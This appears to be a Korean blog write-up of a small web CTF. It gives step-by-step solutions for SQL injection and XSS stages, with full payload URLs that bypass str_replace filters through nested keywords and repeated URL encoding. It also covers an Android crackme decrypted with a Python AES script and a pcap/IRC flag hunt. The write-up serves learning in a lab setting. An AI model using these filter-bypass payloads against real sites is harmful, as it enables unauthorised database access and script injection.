1. sqli
간단한 sql injection, 인자는 pw 하나만 주어진다.
1.0 query
select select id from users where id='guest' and pw=('[user_input]')
1.1 stage 1
http://ptw.alonalab.kr/ctf/sql1.php?pw=%27) or id not like 0x6775657374%23
필터링 되는 부분이 존재하지 않으므로 아래와 비슷한 쿼리를 구성해 인풋을 구성하면 된다.
select select id from users where id='guest' and pw=('') or id not like 'guest'#')
1.2 stage 2
http://ptw.alonalab.kr/ctf/MXEoCtNmAk.php?pw=%27) || id not like 0x6775657374+--+
약간의 필터링이 존재하므로 이리저리 우회를 하면 되고 stage1에서 변한건 주석정도 밖에 없다.
select select id from users where id='guest' and pw=('') or id not like 'guest' -- ')
1.3 stage 3
http://ptw.alonalab.kr/ctf/cF8D1.php?pw=%27) || id not like 0x6775657374%23
stage2와 동일
1.4 final
http://ptw.alonalab.kr/ctf/AohZV.php?pw=%27)||id+lilikeke+0x61646D696E%26%26+true+--+
str_replace를 해서 필터링하므로 lilikeke => like와 같이 replace해서 우회되도록 만든다.
select select id from users where id='guest' and pw=('') or id lilikeke 'admin' -- ')
replaced ==> select select id from users where id='guest' and pw=('') or id like 'admin' -- ')
2. xss
간단한 xss, 인자는 answer를 통해서 받을 수 있고 잘 우회만 해주면 된다.
2.1 stage1
http://ptw.alonalab.kr/ctf/xss1.php?answer=%3Cscript%3Ealert(document.domain)%3C/script%3E
script가 공백으로 치환되므로 scrscriptipt를 사용하여 우회한다. 다만 여기서 "/" 도 공백치환이 되는데 이는 서버에서 urldecode를 한번더 하는것으로 보이므로 %252f와 같이 double url encoding을 해준다.
2.2 stage2
http://ptw.alonalab.kr/ctf/KcmPU.php?answer=%253cscrscriptipt%253ealert%2528document.domain%2529%253c%25%252f2fscrscriptipt%253e
stage1에서 사용한 double url encoding을 해주면 된다. 다만 "/"를 %252f로 우회했었지만 이를 공백으로 치환하므로 %25%252f2f와 같이 우회하면 된다.
2.3 stage3
http://ptw.alonalab.kr/ctf/PGfCS.php?answer=%25%253c3cscrscriptipt%25%253e3ealert%25%252828document.domain%25%252929%25%253c3c%25%252f2fscrscriptipt%25%253e3e
stage2에서 사용했던 방법들을 적당히 필터링 되는 문자에 적용해주면 된다.
%252f => ""
%25%252f2f => "/"
2.4 final
http://ptw.alonalab.kr/ctf/Ct0Rx.php?answer=%25%253c3cscrscriptipt%25%25%25%253e3e3e3ealert%25%25%25%2528282828document.domain%25%252929%25%253c3c%25%252f2fscrscriptipt%25%25%25%253e3e3e3e
stage3에서 사용했던 방법을 특정 문자에 대해서 몇 번만 더해주면 된다. (4번정도)
3. reversing
이 문제는.... 바이너리에 서버로 요청해야될 result가 base64 encode된 형태로 박혀있다.
UGxheVRoZVdlYg== => PlayTheWeb
http://ptw.alonalab.kr/ctf/reverse1.php?result=PlayTheWeb
요청해서 플래그를 확인하면 된다.
4. android
대충 코드를 까보면 루팅체크를 하는 등의 동적 디버깅을 힘들게 하는 작업을 했지만, 난독화가 아니라서 정적 분석하기 쉽다. apk decompile 툴을 써도 좋고 간단하게 디컴파일 결과를 확인하고 싶을 때 http://www.javadecompilers.com/apk 여기를 사용한다.
코드를 분석하다보면 sources/p004kr/alonalab/ptw_crackme/AES256Chiper.java 에서 iv, key가 드러나있고 aes-128/cbc를 사용하는 것을 볼 수 있다. 그리고 복호화해야될 문자열이 Keyverify.java에 존재하므로 아래와 같이 간단한 python 코드를 작성하면 된다.
from Crypto.Cipher import AES
BLOCK_SIZE = 16
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)
unpad = lambda s: s[:-ord(s[len(s) - 1:])]
key = "RvAq2$CyZ;x}bQdV@),28v[,Du3Q?Cjq".ljust(BLOCK_SIZE, "\x00")
iv = "".ljust(BLOCK_SIZE, "\x00")
aes = AES.new(key, AES.MODE_CBC, IV=iv)
enc = "Qk0wR3FQNEFjVjdBck0vK0pNUndUUT09".decode('base64').decode('base64')
print aes.decrypt(enc)
aes = AES.new(key, AES.MODE_CBC, IV=iv)
enc = "U2NKQWRsa0ZtQllpNlVQamZlOWgxQT09".decode('base64')
print aes.decrypt(enc)
5. network
pcap파일을 wireshark로 열어서 http패킷을 찾아보면, https://blog.alonalab.kr/27에 요청한 기록이 나오고 비밀번호가 걸려있다. 힌트로 PlayTheWeb이라고 했으니 게싱으로 비밀번호로 넣어봤더니 아래의 pastbin링크가 나오게 되었다.
https://pastebin.com/raw/bL8nQLHu
Hey! Guess the question!
1. ????? is an application layer protocol that facilitates communication in the form of text. The chat process works on a client/server networking model.
2. Sub Domain?
Made By [alonalab.kr]
#bot
1번의 답은 irc protocol 이고 subdomain이 존재한다는 것을 2번이 암시하고 있다. irc.alonalab.kr에 ping을 날려 확인하고, irc client를 아무거나 받은 다음 #bot 채널에 입장해 @flag를 입력하면 봇이 플래그를 출력해준다.
'Write up > Wargame' 카테고리의 다른 글
LFH 문제 분석한 거 (0) | 2016.12.13 |
---|---|
[Wargame.kr] vulnerability (0) | 2016.10.02 |
[Wargame.kr] Admin 계정 탈취 인증샷 (0) | 2016.10.02 |
[Wargame.kr] All Clear (0) | 2016.09.13 |
[Wargame.kr] zairo (0) | 2016.09.08 |